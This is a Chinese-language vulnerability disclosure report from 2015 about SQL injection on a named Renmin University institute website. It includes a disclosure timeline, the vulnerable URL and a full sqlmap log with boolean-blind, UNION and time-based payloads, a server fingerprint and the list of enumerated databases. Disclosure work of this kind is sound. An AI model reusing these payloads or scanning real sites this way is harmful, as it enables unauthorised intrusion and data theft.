2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-27: 厂商已经确认,细节仅向厂商公开 2015-10-07: 细节向核心白帽子及相关领域专家公开 2015-10-17: 细节向普通白帽子公开 2015-10-27: 细节向实习白帽子公开 2015-11-11: 细节向公众公开
中国人民大学汉青经济与金融高级研究院(以下简称汉青研究院)是企业家赵汉青先生在中国人民大学捐资建立的一个新型国际化学院,于2007年3月正式揭牌成立,中国人民大学原校长纪宝成教授和诺贝尔经济学奖获得者斯蒂格利茨教授任名誉院长。梁晶教授任执行院长,主持工作。研究院同时成立了由中国人民大学原校长黄达教授、普林斯顿大学邹至庄教授、全国人大财经委副主任吴晓灵教授、普林斯顿大学熊伟教授、斯坦福大学洪瀚教授任主任的学术委员会。
可获得多个站点管理员密码注入点:http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34
[00:20:23] [INFO] testing connection to the target url[00:20:24] [INFO] heuristics detected web page charset 'ISO-8859-2'[00:20:24] [INFO] testing if the url is stable, wait a few seconds[00:20:26] [INFO] url is stable[00:20:26] [INFO] testing if GET parameter 'class' is dynamic[00:20:27] [INFO] confirming that GET parameter 'class' is dynamic[00:20:28] [INFO] GET parameter 'class' is dynamic[00:20:29] [WARNING] reflective value(s) found and filtering out[00:20:29] [WARNING] heuristic test shows that GET parameter 'class' might not be injectable[00:20:29] [INFO] testing for SQL injection on GET parameter 'class'[00:20:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:20:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[00:20:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[00:21:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[00:21:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:21:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[00:21:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[00:21:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:21:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[00:21:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[00:21:51] [INFO] testing 'Oracle AND time-based blind'[00:22:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[00:23:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[00:23:13] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option[00:24:31] [WARNING] GET parameter 'class' is not injectable[00:24:31] [INFO] testing if GET parameter 'iClassID' is dynamic[00:24:32] [INFO] confirming that GET parameter 'iClassID' is dynamic[00:24:33] [INFO] GET parameter 'iClassID' is dynamic[00:24:34] [WARNING] heuristic test shows that GET parameter 'iClassID' might not be injectable[00:24:34] [INFO] testing for SQL injection on GET parameter 'iClassID'[00:24:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:24:38] [INFO] GET parameter 'iClassID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[00:24:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:24:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[00:24:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[00:24:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[00:24:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:24:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[00:24:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[00:24:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:25:44] [INFO] GET parameter 'iClassID' is 'MySQL > 5.0.11 AND time-based blind' injectable[00:25:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:25:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[00:25:46] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[00:25:52] [INFO] target url appears to have 38 columns in query[00:26:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[00:26:29] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. --flush-session --technique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)[00:27:12] [INFO] GET parameter 'iClassID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'iClassID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 233 HTTP(s) requests:---Place: GETParameter: iClassID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: class=gjjl&iClassID=34 AND 7256=7256 Type: UNION query Title: MySQL UNION query (NULL) - 38 columns Payload: class=gjjl&iClassID=34 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6672613a,0x446f6d597153646b6a53,0x3a6973743a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: class=gjjl&iClassID=34 AND SLEEP(5)---[00:46:17] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: Apache 2.4.6, PHP 5.4.16back-end DBMS: MySQL 5.0.11[00:46:17] [INFO] fetching database namesavailable databases [17]:[*] demo_hanqing[*] demo_hq2014[*] demo_hq2015[*] demo_hq_bak[*] demo_hqen[*] demo_psycamp2014[*] demo_psyweb[*] hanqing_research[*] hanqing_sign[*] huazi[*] hxzcw[*] information_schema[*] lieren[*] mysql[*] ocity[*] performance_schema[*] weixin_yingtao
严格过滤
危害等级:中
漏洞Rank:8
确认时间:2015-09-27 12:02
尽快通知相关人员进行处理
暂无
